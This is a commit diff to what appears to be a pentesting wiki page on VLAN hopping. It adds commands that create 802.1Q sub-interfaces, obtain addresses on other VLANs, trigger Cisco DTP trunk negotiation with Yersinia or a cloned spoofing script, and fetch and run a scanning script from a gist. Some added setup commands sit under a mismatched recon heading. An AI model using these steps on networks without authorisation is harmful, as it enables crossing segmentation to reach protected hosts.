Update lateral-vlan-segmentation-bypass.md

2025-10-10 18:36:50 +00:00 · 2025-08-18 13:59:20 +02:00 · 2025-08-18 13:59:20 +02:00 · 8aacbc1dd1
commit 8aacbc1dd1
parent 1d5db450d1
1 changed files with 20 additions and 5 deletions
--- a/src/generic-methodologies-and-resources/pentesting-network/lateral-vlan-segmentation-bypass.md
+++ b/src/generic-methodologies-and-resources/pentesting-network/lateral-vlan-segmentation-bypass.md
@ -36,6 +36,10 @@ sudo vconfig add eth0 10
 sudo vconfig add eth0 20
 sudo vconfig add eth0 50
 sudo vconfig add eth0 60
+sudo ifconfig eth0.10 up
+sudo ifconfig eth0.20 up
+sudo ifconfig eth0.50 up
+sudo ifconfig eth0.60 up

 # Modern (ip-link – preferred)
 sudo modprobe 8021q
@ -43,6 +47,8 @@ sudo ip link add link eth0 name eth0.10 type vlan id 10
 sudo ip link add link eth0 name eth0.20 type vlan id 20
 sudo ip link set eth0.10 up
 sudo ip link set eth0.20 up
+sudo dhclient -v eth0.50
+sudo dhclient -v eth0.60
 ```

 Subsequently, an address request is made via DHCP. Alternatively, in cases where DHCP is not viable, addresses can be manually configured:
@ -55,6 +61,8 @@ sudo dhclient -v eth0.20
 Example for manually setting a static IP address on an interface (VLAN 10):

 ```bash
+sudo ifconfig eth0.10 10.10.10.66 netmask 255.255.255.0
+# or
 sudo ip addr add 10.10.10.66/24 dev eth0.10
 ```

@ -76,18 +84,25 @@ Cisco switches that keep DTP enabled will happily negotiate a trunk if the peer

 ```bash
 # Become a trunk using Yersinia (GUI)
-$ sudo yersinia -G          # Launch GUI → Launch attack → DTP → enabling trunking
+sudo yersinia -G          # Launch GUI → Launch attack → DTP → enabling trunking

 # Python PoC (dtp-spoof)
-$ git clone https://github.com/fleetcaptain/dtp-spoof.git
-$ sudo python3 dtp-spoof/dtp-spoof.py -i eth0 --desirable
+git clone https://github.com/fleetcaptain/dtp-spoof.git
+sudo python3 dtp-spoof/dtp-spoof.py -i eth0 --desirable
 ```

 Recon helper (passively fingerprint the port’s DTP state):

 ```bash
-$ wget https://gist.githubusercontent.com/mgeeky/3f678d385984ba0377299a844fb793fa/raw/dtpscan.py
-$ sudo python3 dtpscan.py -i eth0
+sudo modprobe 8021q
+sudo ip link add link eth0 name eth0.30 type vlan id 30
+sudo ip addr add 10.10.30.66/24 dev eth0.30
+sudo ip link set eth0.30 up
+
+# or
+
+wget https://gist.githubusercontent.com/mgeeky/3f678d385984ba0377299a844fb793fa/raw/dtpscan.py
+sudo python3 dtpscan.py -i eth0
 ```

 Once the port switches to trunk you can create 802.1Q sub-interfaces and pivot exactly as shown in the previous section.